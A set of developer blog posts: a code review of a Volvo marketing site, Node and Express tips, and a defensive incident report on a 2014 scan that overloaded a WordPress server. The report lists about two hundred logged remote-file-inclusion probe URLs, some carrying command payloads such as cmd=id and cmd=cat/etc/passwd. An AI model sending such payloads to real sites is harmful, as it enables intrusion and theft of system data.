Unboxing the Wagon – peeking at code

A media buy on the Weather Channel website caught my eye. I want to see what makes http://www.thewagonunboxed.com/ tick.

Meta Tags

Nice to see Open Graph tags. I’m curious about how the html tag’s data attributes are used. Also good to see most of the JS isn’t loaded up here.

<html class="en desktop no-js" data-cache-key="http://www.thewagonunboxed.com/index.php|en|desktop" data-environment="production">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>THE WAGON. ÜNBOXED.</title>
  <meta name="description" content="Move in a new direction. See the All-New 2015 Volvo V60 Sportswagon. The perfect combination of power, performance and profile.">
  <meta property="og:title" content="THE WAGON. ÜNBOXED.">
  <meta property="og:type" content="website">
  <meta property="og:url" content="http://www.thewagonunboxed.com/index.php">
  <meta property="og:site_name" content="THE WAGON. ÜNBOXED.">
  <meta property="og:description" content="Move in a new direction. See the All-New 2015 Volvo V60 Sportswagon. The perfect combination of power, performance and profile.">
  <meta property="og:image" content="http://www.thewagonunboxed.com/img/common/volvo-logo-en-300.jpg">
  <meta name="viewport" content="width=device-width">
  <meta name="viewport" content="initial-scale=1.0, user-scalable=no">
  <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" type="text/css" href="http://volvo.cachefly.net/css/main.min.css">
    <link rel="stylesheet" type="text/css" href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.min.css">
  <script src="//cdnjs.cloudflare.com/ajax/libs/modernizr/2.7.1/modernizr.min.js"></script>

Old browser? Nope!

Good call! Send users with weak browsers to another site. Beats building a fallback that barely delivers a good experience.

 if ( ! Modernizr.canvas || ! Modernizr.backgroundsize) {
    capable = false;
    window.location.replace('http://www.volvocars.com/en-ca/Pages/default.aspx');
  }

Google Analytics Data attributes?

I did not know this was a thing. Cool jQuery plugin @ https://github.com/JimBobSquarePants/jQuery-Google-Analytics

<a
          href="https://www.facebook.com/volvocarsofcanada/app_242992689206644"
          class="pill-button"
          data-ga-hittype="event"
          data-ga-category="outgoing links"
          data-ga-action="click"
          data-ga-label="facebook contest"
        >Enter Now</a>

Pixi.js

Here’s another library I didn’t know about. It is for making fast 2D WebGL things with JS. Nice demos! https://github.com/GoodBoyDigital/pixi.js/

The Meat

Good on the team for minifying their JS in http://volvo.cachefly.net/js/v60.min.js. Running it through JS Beautify reveals about 1000 lines of JS which follow some good practices like not putting everything into the global scope and using requestFrame for animation.

File Sizes

Chrome’s Network inspector tells me the site downloads about 8.9mb when viewed in a desktop-sized window, and 5.1mb when viewed in a phone-sized window. Most of that is images. Lots of transparent .pngs.

Here’s an interesting sprite sheet for vehicle colors: http://www.thewagonunboxed.com/img/vignette/chalet/car-colours.png

Car rotation images are biiiig: http://volvo.cachefly.net/img/features/exterior/red/1920/26.png

Things I wish I knew about Node + Express before making my first website with it

Develop with nodemon, deploy with forever

nodemon vs forever? More like nodemon AND forever! nodemon is live reload for Node apps. When it detects a file in your application has changed, it will restart your application for you. It does not require much configuration, and will save you many keystrokes and mouse clicks. My typical nodemon command looks like:

nodemon app.js --debug

It can also be used as part of a grunt command with grunt-nodemon.

Apps that restart well with nodemon will work better with forever. When your live application crashes despite all your unit tests passing, forever will automatically restart it. It offers more flexible logging, and can manage several nodejs apps at once. You can start an app with forever with a command like this:

forever start app.js

Waking up in the morning to see your Apache logs full of PHP errors isn’t fun, but the site may still be up and running. Waking up in the morning to see 1 error in your Node app brought the site down for hours is less fun. forever can help with that.

How to set environment variables

Environment variables are a good place to store private things like passwords and keys needed by your app. You don’t want those in your source code. I grew up using Windows, and didn’t know this method. Try running this command with nodejs installed:

NODE_ENV=debug DB_URL=mongodb://urlhere.ca STUFF=great node

This will start nodejs with environment variables named NODE_ENV, DB_URL, and STUFF set and ready to use. Type this command into the nodejs console next:

console.log(process.env)

You’ll see NODE_ENV, DB_URL, and STUFF included in the list of other environment variables like PATH, ready to be used by your application. The variables will go away when the nodejs process ends. I find this very helpful when working on Heroku-hosted apps. Heroku uses environment variables for storing authentication info for many add-ons, and being able to duplicate those settings locally while developing brings me one step closer to matching their environment.

I have tested this out with nodemon and forever on Windows with the Git terminal as well as Linux, and it works in all cases.

NODE_ENV=production DB_URL=mongodb://urlhere.ca nodemon index.js
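Since these variables hold secrets, the app should refuse to start when one is missing and should never print them raw the way console.log(process.env) does. The following is an added example, not code from the original post; loadConfig, redactUrl and describeConfig are hypothetical names, the credentials are constructed, and a single-host mongodb:// URL like the one above is assumed.

```javascript
'use strict';

// Variables the app cannot run without (names taken from the commands above).
const REQUIRED = ['NODE_ENV', 'DB_URL'];

// Validate the environment once at startup and fail fast.
// Error messages name the variable but never echo its value.
function loadConfig(env) {
  const missing = REQUIRED.filter((name) => !env[name]);
  if (missing.length) {
    throw new Error('Missing environment variables: ' + missing.join(', '));
  }
  let db;
  try {
    db = new URL(env.DB_URL);
  } catch (e) {
    throw new Error('DB_URL is not a valid URL');
  }
  if (db.protocol !== 'mongodb:') {
    throw new Error('DB_URL must use the mongodb:// scheme');
  }
  return { nodeEnv: env.NODE_ENV, dbUrl: env.DB_URL };
}

// Return a copy of the URL that is safe to log: the password is masked and
// the query string is dropped because it can carry auth options.
function redactUrl(raw) {
  const u = new URL(raw);
  const auth = u.username ? `${u.username}${u.password ? ':***' : ''}@` : '';
  return `${u.protocol}//${auth}${u.host}${u.pathname}`;
}

// What to log at startup instead of dumping process.env.
function describeConfig(config) {
  return { nodeEnv: config.nodeEnv, dbUrl: redactUrl(config.dbUrl) };
}

// Constructed environment for demonstration; a real app passes process.env.
const demoEnv = {
  NODE_ENV: 'debug',
  DB_URL: 'mongodb://app:s3cret@urlhere.ca:27017/contest'
};
console.log(describeConfig(loadConfig(demoEnv)));
```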

node-inspector will save you time

Look at this thing!

Breakpoints

Debugging Screenshot

Better logging

Console Screenshot

All for Node! You won’t want to use console.log() debugging after seeing this. It will save you time. I’m not even going to put an example here. Watch a screencast to get started.

Use async.js to prevent callback hell

Update 2015: Promises are more powerful, but a bit harder to understand, and Functional Reactive Streams are a bigger step away from imperative programming.

Before you write your callback in a callback in a callback in a callback, try out async.js. It will force you to think harder about the input and output of your functions, reduce the amount of code you write, and probably improve the testability of your code as well.

Here’s how good NOT nesting callbacks 6 levels deep can look:

async.waterfall([
    // make raw Tweet into something useful
    contentTransformer.transformTweet.bind(this, tweet),
 
    // check the hashtags are valid
    entryChecker.hashtagMatch,
 
    // set the user_has_won property
    entryChecker.userHasWon,
 
    // save transformed Tweet to DB
    entriesController.save,
 
    // prepare to send a DM to the user
    twitterDirectMessager.send
], function (err, result) {
    util.log(TAG + 'saved a tweet. Err? ' + err);
});

Here are 5 functions running in a waterfall pattern. I just have to put my functions in an array, make sure each returns the correct values, and async.waterfall takes care of running them all or stopping when one returns an error, and running one last callback where I can log the result.

util.log() timestamps log messages. console.log() can log multiple objects at once

Use util.log() for messages that are going into logs. You’ll want the timestamps later to diagnose issues. Combine util.log with util.inspect() if you need to log detailed views of objects.

Use console.log() for quick and dirty checks when you forget you have node-inspector in your toolbox.

Automate running npm update after updating from version control

Hours have been wasted on this. Moving from wild files to package management is rad, but also means forming new habits. You probably won’t always notice if package.json changed in the last svn update or git pull, so why not just start running npm update by default?

Learn from boilerplate projects like MEAN and Tableau

Someone else made the hard decisions about what to name folders and files already. Tableau is a relatively lightweight example. MEAN is a stack that integrates Grunt, AngularJS, and Passport. Both packages include helpful examples.

Root users and Open File Limits

See my post on running node as a non-root user and raising open file limits to keep NodeJS web applications running smoothly and securely by using iptables and changing some Ubuntu configuration.

More things I wish I knew about

  • File uploads with Express are more work than PHP and a good framework
  • Separating routes from controllers from business logic (like Laravel and other frameworks) makes for easier testing.

Jan 1, 2014 WordPress Attack

Summary

A site I monitor saw 1185 requests from 94.138.x.x between Jan 01 05:32:41 & 06:21:09 UTC looking for nonexistent pages. This site runs on a small server, and WordPress tried to handle the errors in its slow and complicated way. As a result, Apache and MySQL were overloaded.

I believe the goal of the attack was to identify vulnerable software on the web server. Taking the server down was a side effect.

Error log samples

[Wed Jan 01 05:56:19 2014] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Wed Jan 01 06:16:44 2014] [error] [client 50.31.164.139] WordPress database err or MySQL server has gone away for query UPDATE `wp_options` SET `option_value` = 'a:3:{i:0;b:0;s:43:\\"events-calendar-pro/events-calendar-pro.php\\";s:19:\\"tribe_ecp_uninstall\\";s:39:\\"options-framework/options-framework.php\\";s:31:\\"optionsframework_delete_options\\";}' WHERE `option_name` = 'uninstall_plugins'made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), include_once('/plugins/options-framework/options-framework.php'), register_uninstall_hook, update_option

Apache was unable to fork new processes, and MySQL stopped responding.

Useful commands

I found some helpful bash commands on various blogs for searching through Apache logs. These were particularly handy:

Count rows with IP address

cat access.log | grep 94.138.208.58 | wc -l

Get rows with an IP address

cat access.log | grep 94.138.208.58

Get just URLs requested

cat access.log | grep 94.138.208.58 | awk -F\" '{print $2}' > ~/jan01-badreqs.txt

Solutions:

I’ve added some lines to .htaccess to block WordPress from handling certain requests which I know will result in 404s. Apache will send a 404 response right away, before PHP handles the request.

Fail2Ban would also be a good idea. It could detect a user accessing more than some number of URLs resulting in 404s, and block them from accessing the site temporarily.
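The detection Fail2Ban would perform here, as an added Node.js example (not code from the original post and not Fail2Ban itself): count 404 responses per client IP inside a sliding time window and report the clients that cross a threshold. The option names maxRetry and findTimeSec echo Fail2Ban's maxretry and findtime settings; the log lines are constructed, and the code assumes lines arrive in chronological order.

```javascript
'use strict';

const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5,
                 Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };

// Apache common/combined format: ip ident user [time] "request" status ...
// The request group tolerates backslash-escaped quotes inside the request line.
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "((?:[^"\\]|\\.)*)" (\d{3}) /;
const TIME_RE = /^(\d{2})\/(\w{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$/;

// Convert "01/Jan/2014:05:32:41 +0000" to epoch milliseconds (UTC).
function parseApacheTime(text) {
  const m = TIME_RE.exec(text);
  if (!m || !(m[2] in MONTHS)) return null;
  const local = Date.UTC(+m[3], MONTHS[m[2]], +m[1], +m[4], +m[5], +m[6]);
  const offsetMin = (m[7] === '-' ? -1 : 1) * (+m[8] * 60 + +m[9]);
  return local - offsetMin * 60000;
}

// Parse one access-log line; returns null for anything that does not match.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const time = parseApacheTime(m[2]);
  if (time === null) return null;
  return { ip: m[1], time, request: m[3], status: Number(m[4]) };
}

// Report every client that produced at least maxRetry 404s within findTimeSec.
function find404Bursts(lines, { maxRetry = 5, findTimeSec = 60 } = {}) {
  const windows = new Map();   // ip -> timestamps of 404s still inside the window
  const offenders = new Map(); // ip -> { ip, firstTrigger, peak }
  let skipped = 0;             // unparseable lines, worth watching on their own

  for (const line of lines) {
    if (!line.trim()) continue;
    const hit = parseLine(line);
    if (!hit) { skipped++; continue; }
    if (hit.status !== 404) continue;

    const recent = windows.get(hit.ip) || [];
    recent.push(hit.time);
    // Drop 404s that have aged out of the sliding window.
    while (recent.length && hit.time - recent[0] > findTimeSec * 1000) {
      recent.shift();
    }
    windows.set(hit.ip, recent);

    if (recent.length >= maxRetry) {
      const entry = offenders.get(hit.ip) || {
        ip: hit.ip,
        firstTrigger: new Date(hit.time).toISOString(),
        peak: 0
      };
      entry.peak = Math.max(entry.peak, recent.length);
      offenders.set(hit.ip, entry);
    }
  }
  return { offenders: [...offenders.values()], skipped };
}

// Constructed sample log: documentation IP ranges and made-up paths.
function sampleLog() {
  const lines = [];
  for (let s = 0; s < 6; s++) {
    // One 404 per second from the same client.
    lines.push(`203.0.113.7 - - [01/Jan/2014:05:32:4${s} +0000] ` +
               `"GET /missing-${s}.php HTTP/1.1" 404 512 "-" "scanner"`);
  }
  lines.push('198.51.100.20 - - [01/Jan/2014:05:33:00 +0000] "GET / HTTP/1.1" 200 9001 "-" "browser"');
  lines.push('198.51.100.20 - - [01/Jan/2014:05:33:05 +0000] "GET /favicon.ico HTTP/1.1" 404 210 "-" "browser"');
  lines.push('198.51.100.20 - - [01/Jan/2014:05:40:00 +0000] "GET /old-page HTTP/1.1" 404 210 "-" "browser"');
  lines.push('not an access log line');
  return lines;
}

console.log(find404Bursts(sampleLog(), { maxRetry: 5, findTimeSec: 60 }));
```

An ordinary visitor who hits a couple of dead links minutes apart stays under the threshold; only the burst is reported.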

Some URLs requested during the attack

/circ.php?include_path=http://www.google.com/humans.txt?
/circolari/cir_save.php?CLASSPATH=http://www.google.com/humans.txt?
/citywriter/head.php?path=http://www.google.com/humans.txt?
/cl_files/index.php?path_to_calendar=http://www.google.com/humans.txt?
/claroline/auth/ldap/authldap.php?includePath=http://www.google.com/humans.txt?
/claroline/phpbb/page_tail.php?includePath=http://www.google.com/humans.txt?
/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=http://www.google.com/humans.txt?
/class.mysql.php?path_to_bt_dir=http://www.google.com/humans.txt?
/class/Wiki/Wiki.php?c_node[class_path]=http://www.google.com/humans.txt?
/class/jpcache/jpcache.php?_PSL[classdir]=http://www.google.com/humans.txt?exec=uname
/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=http://www.google.com/humans.txt?
/classified.php?insPath=http://www.google.com/humans.txt?
/classified_right.php?language_dir=http://www.google.com/humans.txt?
/classifieds/index.php?lowerTemplate=http://www.google.com/humans.txt?
/clear.php?bibtexrootrel=http://www.google.com/humans.txt?
/clearinfo.php?bibtexrootrel=http://www.google.com/humans.txt?
/click.php?dir=http://www.google.com/humans.txt?
/client.php?dir=http://www.google.com/humans.txt?
/client/faq_1/PageController.php?dir=http://www.google.com/humans.txt?
/clients/index.php?src=http://www.google.com/humans.txt?
/cls_fast_template.php?fname=http://www.google.com/humans.txt?
/cm68news/engine/oldnews.inc.php?addpath=http://www.google.com/humans.txt?&
/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://www.google.com/humans.txt?
/cms/meetweb/classes/ManagerResource.class.php?root_path=http://www.google.com/humans.txt?
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=http://www.google.com/humans.txt?
/cms/meetweb/classes/RegForm.class.php?root_path=http://www.google.com/humans.txt?
/cms/meetweb/classes/RegResource.class.php?root_path=http://www.google.com/humans.txt?
/cms/meetweb/classes/RegRightsResource.class.php?root_path=http://www.google.com/humans.txt?
/cms/meetweb/classes/modules.php?root_path=http://www.google.com/humans.txt?
/cms/modules/form.lib.php?sourceFolder=http://www.google.com/humans.txt?
/cms/system/openengine.php?oe_classpath=http://www.google.com/humans.txt???
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://www.google.com/humans.txt?
/cn_config.php?tpath=http://www.google.com/humans.txt?
/coast/header.php?sections_file=http://www.google.com/humans.txt?
/code/berylium-classes.php?beryliumroot=http://www.google.com/humans.txt?
/code/display.php?admindir=http://www.google.com/humans.txt?
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.google.com/humans.txt?
/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.google.com/humans.txt?
/com_media_library/toolbar_ext.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/comments.php?AMG_serverpath=http://www.google.com/humans.txt?
/comments.php?scriptpath=http://www.google.com/humans.txt?
/common.inc.php?CFG[libdir]=http://www.google.com/humans.txt?
/common.inc.php?base_path=http://www.google.com/humans.txt?
/common.php?db_file=http://www.google.com/humans.txt?
/common.php?dir=http://www.google.com/humans.txt?
/common.php?ezt_root_path=http://www.google.com/humans.txt?
/common.php?include_path=http://www.google.com/humans.txt?
/common.php?livealbum_dir=http://www.google.com/humans.txt?
/common.php?locale=http://www.google.com/humans.txt?
/common.php?phpht_real_path=http://www.google.com/humans.txt?
/common/db.php?commonpath=http://www.google.com/humans.txt?
/common/func.php?CommonAbsD=http://www.google.com/humans.txt?
/common/func.php?CommonAbsDir=http://www.google.com/humans.txt?
/community/Offline.php?sourcedir=http://www.google.com/humans.txt?
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.google.com/humans.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.google.com/humans.txt?
/components/core/connect.php?language_path=http://www.google.com/humans.txt?
/components/minibb/bb_plugins.php?absolute_path=http://www.google.com/humans.txt?
/components/minibb/index.php?absolute_path=http://www.google.com/humans.txt?
/components/xmlparser/loadparser.php?absoluteurl=http://www.google.com/humans.txt?
/compteur/mapage.php?chemin=http://www.google.com/humans.txt?
/conf.php?securelib=http://www.google.com/humans.txt?
/config.inc.php3?rel_path=http://www.google.com/humans.txt?
/config.inc.php?_path=http://www.google.com/humans.txt?
/config.inc.php?path_escape=http://www.google.com/humans.txt?
/config.inc.php?path_escape=http://www.google.com/humans.txt?%00
/config.php?full_path=http://www.google.com/humans.txt?
/config.php?full_path_to_db=http://www.google.com/humans.txt?
/config.php?fullpath=http://www.google.com/humans.txt?
/config.php?incpath=http://www.google.com/humans.txt?
/config.php?path_to_root=http://www.google.com/humans.txt?
/config.php?rel_path=http://www.google.com/humans.txt?
/config.php?returnpath=http://www.google.com/humans.txt?
/config.php?sql_language=http://www.google.com/humans.txt?
/config.php?xcart_dir=http://www.google.com/humans.txt?
/config/config_admin.php?INC=http://www.google.com/humans.txt?
/configuration.php?absolute_path=http://www.google.com/humans.txt?
/confirmUnsubscription.php?output=http://www.google.com/humans.txt?
/connect.php?path=http://www.google.com/humans.txt?
/contenido/external/frontend/news.php?cfg[path][includes]=http://www.google.com/humans.txt?
/content.php?content=http://www.google.com/humans.txt?
/content/admin.php?pwfile=http://www.google.com/humans.txt?
/content/modify_go.php?pwfile=http://www.google.com/humans.txt?
/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=http://www.google.com/humans.txt?
/contrib/mx_glance_sdesc.php?mx_root_path=http://www.google.com/humans.txt?
/contrib/phpBB2/modules.php?phpbb_root_path=http://www.google.com/humans.txt?
/controllers/MySQLController.php?baseDir=http://www.google.com/humans.txt?
/controllers/SQLController.php?baseDir=http://www.google.com/humans.txt?
/controllers/SetupController.php?baseDir=http://www.google.com/humans.txt?
/controllers/VideoController.php?baseDir=http://www.google.com/humans.txt?
/controllers/ViewController.php?baseDir=http://www.google.com/humans.txt?
/convert-date.php?cal_dir=http://www.google.com/humans.txt?
/convert/mvcw.php?step=1&vwar_root=http://www.google.com/humans.txt?
/convert/mvcw.php?vwar_root=http://www.google.com/humans.txt?
/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlhttp://www.google.com/humans.txt?
/core/admin/editdel.php?p=admin&absoluteurlhttp://www.google.com/humans.txt?
/core/admin/ftpfeature.php?p=admin&absoluteurlhttp://www.google.com/humans.txt?
/core/admin/login.php?absoluteurlhttp://www.google.com/humans.txt?
/core/admin/pgRSSnews.php?absoluteurlhttp://www.google.com/humans.txt?
/core/admin/showcat.php?absoluteurlhttp://www.google.com/humans.txt?
/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlhttp://www.google.com/humans.txt?
/core/archive_cat.php?absoluteurlhttp://www.google.com/humans.txt?
/core/archive_nocat.php?absoluteurlhttp://www.google.com/humans.txt?
/core/aural.php?site_absolute_path=http://www.google.com/humans.txt?
/core/aural.php?site_absolute_path=http://www.google.com/humans.txt?&cmd=dir
/core/editor.php?editor_insert_bottom=http://www.google.com/humans.txt?
/core/includes.php?CMS_ROOT=http://www.google.com/humans.txt?
/core/recent_list.php?absoluteurlhttp://www.google.com/humans.txt?
/corpo.php?pagina=http://www.google.com/humans.txt?
/cp2.php?securelib=http://www.google.com/humans.txt?
/cpe/index.php?repertoire_config=http://www.google.com/humans.txt?
/crea.php?plancia=http://www.google.com/humans.txt?
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://www.google.com/humans.txt?
/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://www.google.com/humans.txt?
/creat_news_all.php?language=http://www.google.com/humans.txt?
/create_file.php?target=http://www.google.com/humans.txt?
/cron.php?ROOT_PATH=http://www.google.com/humans.txt?
/cron.php?include_path=http://www.google.com/humans.txt?
/crontab/run_billing.php?config[include_dir]=http://www.google.com/humans.txt?
/cross.php?url=http://www.google.com/humans.txt?
/custom_vars.php?sys[path_addon]=http://www.google.com/humans.txt?
/customer/product.php?xcart_dir=http://www.google.com/humans.txt?
/cwb/comanda.php?INCLUDE_PATH=http://www.google.com/humans.txt?
/datei.php?config[root_ordner]=http://www.google.com/humans.txt?&cmd=id
/db/PollDB.php?CONFIG_DATAREADERWRITER=http://www.google.com/humans.txt?
/db/mysql/db.inc.php?SPL_CFG[dirroot]=http://www.google.com/humans.txt?
/dbcommon/include.php?_APP_RELATIVE_PATH=http://www.google.com/humans.txt?
/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.google.com/humans.txt?
/debugger.php?config_atkroot=http://www.google.com/humans.txt?
/decoder/gallery.php?ccms_library_path=http://www.google.com/humans.txt?
/decoder/markdown.php?ccms_library_path=http://www.google.com/humans.txt?
/defaults_setup.php?ROOT_PATH=http://www.google.com/humans.txt?cmd=ls
/defines.php?WEBCHATPATH=http://www.google.com/humans.txt?
/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://www.google.com/humans.txt?&
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=http://www.google.com/humans.txt?
/example-view/templates/dates_list.php?globals[content_dir]=http://www.google.com/humans.txt?
/example-view/templates/root.php?globals[content_dir]=http://www.google.com/humans.txt?
/example.php?site=http://www.google.com/humans.txt?
/example/gamedemo/inc.functions.php?projectPath=http://www.google.com/humans.txt?
/examplefile.php?bibtexrootrel=http://www.google.com/humans.txt?
/files/compose-new.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/folder-rename.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/folders.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/login.php3?err=hack&BSX_HTXDIR=http://www.google.com/humans.txt?
/files/mainfile.php?page[path]=http://www.google.com/humans.txt?&cmd=ls
/files/mbox-list.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/message-delete.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/message-forward.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/message-header.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/files/message-print.php3?BSX_LIBDIR=http://www.google.com/humans.txt?
/forum.php?cfg_file=1&fpath=http://www.google.com/humans.txt?
/forum/forum.php?view=http://www.google.com/humans.txt?
/forum/track.php?path=http://www.google.com/humans.txt?
/frame.php?framefile=http://www.google.com/humans.txt?
/ftp.php?path_local=http://www.google.com/humans.txt?
/function.inc.php?path=http://www.google.com/humans.txt?
/function.php?adminfolder=http://www.google.com/humans.txt?
/function.php?gbpfad=http://www.google.com/humans.txt?
/functions.php?include_path=http://www.google.com/humans.txt?
/functions.php?pmp_rel_path=http://www.google.com/humans.txt?
/functions.php?s[phppath]=http://www.google.com/humans.txt?
/functions.php?set_path=http://www.google.com/humans.txt?
/functions/form.func.php?GLOBALS[PTH][classes]=http://www.google.com/humans.txt?
/functions/general.func.php?GLOBALS[PTH][classes]=http://www.google.com/humans.txt?
/functions/groups.func.php?GLOBALS[PTH][classes]=http://www.google.com/humans.txt?
/functions/js.func.php?GLOBALS[PTH][classes]=http://www.google.com/humans.txt?
/galerie.php?config[root_ordner]=http://www.google.com/humans.txt?cmd=id
/gallery/captionator.php?GALLERY_BASEDIR=http://www.google.com/humans.txt?
/gallery/lib/content.php?include=http://www.google.com/humans.txt?cmd=ls
/gallerypath/index.php?includepath=http://www.google.com/humans.txt?
/gallery/theme/include_mode/template.php?galleryfilesdir=http://www.google.com/humans.txt?
/games.php?id=http://www.google.com/humans.txt?
/games.php?scoreid=http://www.google.com/humans.txt?
/gbook/includes/header.php?abspath=http://www.google.com/humans.txt?
/gemini/page/forums/bottom.php?lang=http://www.google.com/humans.txt?
/gen_m3u.php?phpbb_root_path=http://www.google.com/humans.txt?
/genepi.php?topdir=http://www.google.com/humans.txt?
/generate.php?ht_pfad=http://www.google.com/humans.txt?
/gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd
/gestArt/aide.php3?aide=http://www.google.com/humans.txt?
/get_session_vars.php?path_to_smf=http://www.google.com/humans.txt?
/getpage.php?page=online&doc_path=http://www.google.com/humans.txt?
/global.php?abs_path=http://www.google.com/humans.txt?
/gorum/dbproperty.php?appDirName=http://www.google.com/humans.txt?
/gpb/include/db.mysql.inc.php?root_path=http://www.google.com/humans.txt?
/gpb/include/gpb.inc.php?root_path=http://www.google.com/humans.txt?
/graph.php?DOCUMENT_ROOT=http://www.google.com/humans.txt?
/gruppen.php?config[root_ordner]=http://www.google.com/humans.txt?&cmd=id
/handlers/email/mod.listmail.php?_PM_[path][handle]=http://www.google.com/humans.txt?
/handlers/page/show.php?sous_rep=http://www.google.com/humans.txt?
/head.php?CONFIG[MWCHAT_Libs]=http://www.google.com/humans.txt?
/header.inc.php?CssFile=http://www.google.com/humans.txt?
/header.php?path=http://www.google.com/humans.txt?
/header.php?wwwRoot=http://www.google.com/humans.txt?
/help.php?CONFIG[MWCHAT_Libs]=http://www.google.com/humans.txt?
/inc/ltdialogo.php?pathCGX=http://www.google.com/humans.txt?
/inc/mtdialogo.php?pathCGX=http://www.google.com/humans.txt?
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.google.com/humans.txt?
/inc/prepend.inc.php?path=http://www.google.com/humans.txt?
/inc/service.alert.inc.php?SPL_CFG[dirroot]=http://www.google.com/humans.txt?
/inc/settings.php?inc_dir=http://www.google.com/humans.txt?
/inc/settings.ses.php?SPL_CFG[dirroot]=http://www.google.com/humans.txt?
/inc/shows.inc.php?cutepath=http://www.google.com/humans.txt?
/inc/sige_init.php?SYS_PATH=http://www.google.com/humans.txt?
/inc_group.php?include_path=http://www.google.com/humans.txt?
/inc_manager.php?include_path=http://www.google.com/humans.txt?
/inc_newgroup.php.php?include_path=http://www.google.com/humans.txt?
/inc_smb_conf.php?include_path=http://www.google.com/humans.txt?
/inc_user.php?include_path=http://www.google.com/humans.txt?
/include.php?_APP_RELATIVE_PATH=http://www.google.com/humans.txt?
/include.php?gorumDir=http://www.google.com/humans.txt?
/include.php?myng_root=http://www.google.com/humans.txt?
/include.php?path=psp/user.php&site=http://www.google.com/humans.txt?
/include.php?path[docroot]=http://www.google.com/humans.txt?
/include.php?sunPath=http://www.google.com/humans.txt?
/include/Beautifier/Core.php?BEAUT_PATH=http://www.google.com/humans.txt?
/include/HTML_oben.php?include_path=http://www.google.com/humans.txt?
/include/SQuery/gameSpy2.php?libpath=http://www.google.com/humans.txt?
/include/mail.inc.php?root=http://www.google.com/humans.txt?
/include/menu_builder.php?config[page_dir]=http://www.google.com/humans.txt?
/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://www.google.com/humans.txt?
/include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.google.com/humans.txt?
/include/parser.php?path=http://www.google.com/humans.txt?
/include/pear/IT.php?basepath=http://www.google.com/humans.txt?
/include/pear/ITX.php?basepath=http://www.google.com/humans.txt?
/include/pear/IT_Error.php?basepath=http://www.google.com/humans.txt?
/include/phpxd/phpXD.php?appconf[rootpath]=http://www.google.com/humans.txt?&cmd=id
/include/prodler.class.php?sPath=http://www.google.com/humans.txt???
/include/scripts/export_batch.inc.php?DIR=http://www.google.com/humans.txt?
/include/scripts/run_auto_suspend.cron.php?DIR=http://www.google.com/humans.txt?
/include/scripts/send_email_cache.php?DIR=http://www.google.com/humans.txt?
/include/startup.inc.php?root_path=http://www.google.com/humans.txt?
/includes/xhtml.php?d_root=http://www.google.com/humans.txt?
/index.php3?Application_Root=http://www.google.com/humans.txt?
